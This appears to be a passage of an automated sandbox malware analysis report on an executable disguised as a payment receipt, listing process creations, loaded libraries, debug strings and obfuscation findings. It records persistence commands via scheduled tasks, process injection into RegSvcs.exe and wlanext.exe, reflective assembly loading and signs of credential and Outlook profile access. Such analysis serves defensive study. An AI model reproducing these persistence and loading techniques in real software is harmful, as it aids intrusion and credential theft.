                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
                Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\wlanext.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: dLtX.pdb source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: dLtX.pdbSHA256 source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VfJW2xm7a.exe, 00000010.00000000.2203131007.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp, VfJW2xm7a.exe, 00000012.00000002.4517727575.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                Source: PAYMENT RECEIPT_USD21,000.exe, Login.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: fttQgpyzkkc.exe.0.dr, Login.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.cs | .Net Code: iaW4OAEHHB System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.cs | .Net Code: iaW4OAEHHB System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.7260000.3.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 10.2.fttQgpyzkkc.exe.303a394.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: 0xF89C5109 [Sun Mar 5 09:25:29 2102 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040D87E push 1DC2154Bh; retf 9_2_0040D889
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004141B8 push edx; retn DDCAh 9_2_004141E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00403250 push eax; ret 9_2_00403252
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00419265 push ss; ret 9_2_0041926C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00408269 push cs; retf 9_2_0040826A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00401A95 pushfd ; retf 9_2_00401A9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041839C push 0000002Dh; ret 9_2_0041839F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0042D423 push edi; iretd 9_2_0042D42C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00414C36 push es; retf 9_2_00414C77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00414CA1 push es; iretd 9_2_00414CC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004084A9 push esp; iretd 9_2_004084AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00418572 push esp; retf 9_2_004185E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004185D0 push esp; retf 9_2_004185E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004146F6 push esi; retf B417h 9_2_00414778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040D757 push 5E326CF3h; retf 9_2_0040D763
